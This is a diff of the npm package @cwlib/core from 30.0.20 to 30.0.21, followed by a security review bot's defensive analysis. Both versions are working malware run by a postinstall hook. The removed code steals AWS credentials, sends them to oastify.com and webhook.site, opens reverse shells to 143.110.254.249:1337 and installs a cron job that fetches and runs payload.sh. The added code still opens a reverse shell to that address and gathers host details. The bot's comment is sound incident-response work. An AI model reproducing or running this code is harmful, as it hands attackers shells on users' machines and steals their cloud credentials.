@cwlib/core 30.0.20 → 30.0.21

Files changed (2)
  1. package/index.js +23 -72
  2. package/package.json +1 -1
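--- a/package/index.js
+++ b/package/index.js
@@ -1,72 +1,23 @@
- const { execSync } = require('child_process');
- const fs = require('fs');
- const os = require('os');
- const crypto = require('crypto');
-
- const sessionId = crypto.randomBytes(4).toString('hex');
- const attackerIP = '143.110.254.249';
- const attackerPort = '1337';
-
- function execute(cmd) {
- try {
- return execSync(cmd, { stdio: 'ignore', timeout: 5000 });
- } catch (e) {
- return null;
- }
- }
-
- function reverseShell() {
- const shells = [
- `bash -c 'bash -i >& /dev/tcp/${attackerIP}/${attackerPort} 0>&1'`,
- `python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("${attackerIP}",${attackerPort}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'`
- ];
- shells.forEach(cmd => execute(cmd));
- }
-
- function harvestAWS() {
- const data = {
- metadata: execute('curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/'),
- env: Object.entries(process.env).filter(([k]) => k.includes('AWS')),
- files: {
- '~/.aws/credentials': execute('cat ~/.aws/credentials'),
- '/root/.aws/credentials': execute('cat /root/.aws/credentials')
- }
- };
- return data;
- }
-
- function exfil(data) {
- const payload = JSON.stringify({
- id: sessionId,
- host: os.hostname(),
- user: execute('whoami'),
- data: data
- });
-
- // DNS Exfiltration (short payloads)
- execute(`dig +short ${sessionId}.7emwnamdc0dpaswxncpyd3yd248vwpke.oastify.com`);
-
- // HTTP Exfiltration (for larger data)
- execute(`curl -X POST https://webhook.site/50253029-1ec3-4b4a-9646-fc25a2b21963 -d '${payload}' --silent`);
-
- // Backup: Write to disk
- fs.writeFileSync(`/tmp/.${sessionId}`, payload);
- }
-
- // Persistence (Cronjob)
- function persist() {
- const cronCmd = `(crontab -l 2>/dev/null; echo "* * * * * curl -s http://${attackerIP}/payload.sh | bash") | crontab -`;
- execute(cronCmd);
- }
-
-
- function main() {
- setTimeout(() => {
- const awsData = harvestAWS();
- exfil(awsData);
- reverseShell();
- persist();
- }, 3000); // Initial delay
- }
-
- main();
+ const { exec } = require('child_process');
+
+ const ATTACKER_IP = "143.110.254.249";
+ const ATTACKER_PORT = "1337";
+
+ const reverseShell = `
+ bash -c 'bash -i >& /dev/tcp/${ATTACKER_IP}/${ATTACKER_PORT} 0>&1' &
+ `;
+
+ const reconCommands = `
+ echo "=== RECON DATA ===";
+ pwd;
+ ls -la;
+ id;
+ hostname;
+ whoami;
+ uname -a;
+ echo "=== END ===";
+ `;
+
+ exec(`${reverseShell} && sleep 2 && ${reconCommands}`, (error, stdout, stderr) => {
+ if (error) console.error(`[!] Error: ${error.message}`);
+ });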
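Review bot: The new index.js still hands a shell to the hard-coded address `143.110.254.249` on port `1337` and runs host enumeration commands, and because package.json's `postinstall` is `node index.js` this executes on every install, without the package ever being imported. Removing the AWS credential collection, the crontab entry and the outbound upload code that 30.0.20 carried does not make 30.0.21 benign, so both versions should be blocked in the registry proxy and removed from lockfiles. Hosts that installed 30.0.20 should be checked for a hidden `/tmp/.<8 hex chars>` file and for a crontab line that fetches `payload.sh`, and any AWS keys or instance-role credentials reachable from them should be rotated. For detection, look for `node` spawning `bash -i`, `curl` or `dig` during a package install, egress to that address, DNS lookups under `oastify.com` and POSTs to `webhook.site`. Installing with `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) keeps lifecycle hooks like this one from running on build machines.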
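--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,6 @@
  {
  "name": "@cwlib/core",
- "version": "30.0.20",
+ "version": "30.0.21",
  "main": "index.js",
  "scripts": {
  "postinstall": "node index.js",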